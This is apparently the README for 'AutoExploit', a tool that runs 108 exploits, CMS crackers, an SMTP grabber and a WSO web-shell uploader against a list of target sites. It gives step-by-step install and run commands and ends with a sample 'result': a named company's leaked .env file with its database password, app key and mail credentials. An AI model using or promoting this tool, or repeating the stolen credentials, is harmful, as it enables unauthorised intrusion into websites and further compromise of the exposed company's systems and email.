A powerful tool for finding site vulnerabilities with 108 different exploits β οΈ
- With this tool, you can use the designated exploits so that you can use those vulnerabilities π
- This tool also has crackers, such as WordPress, Joomla and... π
- This tool has WordPress, Joomla, etc. cms
- It also has tools such as Sqli, cpanel, smtp and... π
- You can easily install this tool even in your Linux or Windows π
- βͺ Wp_cloudflare
- βͺ phpunit
- βͺ env
- βͺ osCommerce
- and .......
- π’ getSMTP
- π’ wso Shell Uploader
- π’ cms
- and .......
- π‘ Wordpress
- π‘ drupal
- π‘ joomla
- π‘ opencart
It has shells and special payloads for easier access and penetration into targets
π’ Linux π’ Windows π‘ Termux
- Create a file in txt format and put the targets inside them
- Then copy the targets file to the AutoExploit folder (or give the target file address to the tool
Then enter the following command ππ»
git clone https://github.com/esfelurm/AutoExploit
cd AutoExploit
python AutoExploit.py target.txt
Now it starts testing the exploits
IMG_20231024_230504_176_001.mp4
IMG_20231024_230504_176_002.mp4
- Install prerequisites Kali ππ»
- Copy the targets file
- Enter the tools directory
- We run the tool
- If the vulnerability is found and the work is completed, enter the result folder
- Now open the files named config and you can see the results
sudo apt update && sudo apt upgrade -y
sudo apt install python3 python3-pip
sudo apt install git
pip3 install requests
git clone https://github.com/esfelurm/AutoExploit
Termux ππ»
apt update && apt upgrade
pkg install git
pkg install python3
pip install requests
git clone https://github.com/esfelurm/AutoExploit
cp target.txt AutoExploit
cd AutoExploit
python AutoExploit.py target.txt
cd result
-
Target : https://westlink.com.my
-
image :
- Info :
APP_NAME="Westlink Group Of Companies"
APP_ENV=local
APP_KEY=base64:MKVU0RsaiKzXpRz+AmGyMu/4rOdNPPEvlyXmm3O+BLA=
APP_DEBUG=false
APP_URL=https://www.westlink.com.my/
LOG_CHANNEL=stack
LOG_LEVEL=debug
DB_CONNECTION=mysql
DB_HOST=110.4.45.32
DB_PORT=3306
DB_DATABASE=westlin1_sec_westlink_lat_v1
DB_USERNAME=westlin1_adm1
DB_PASSWORD=%?xwh%]KYFR-
BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
MEMCACHED_HOST=127.0.0.1
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_MAILER=smtp
MAIL_HOST=mail.westlink.com.my
MAIL_PORT=465
MAIL_USERNAME=sales@westlink.com.my
MAIL_PASSWORD=8dxtc+wgojx6
MAIL_ENCRYPTION=ssl
#MAIL_MAILER=smtp
#MAIL_HOST=smtp.mailtrap.io
#MAIL_PORT=2525
#MAIL_USERNAME=d5d5c2b307fe1f
#MAIL_PASSWORD=4912217d7c6151
#MAIL_ENCRYPTION=tls
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
BUSS_ADMIN="/admin_wlx"
BUSS_NAME="Westlink Engineering Sdn. Bhd"
BUSS_PHONE="+607-3539737"
BUSS_EMAIL="info@westlink.com.my"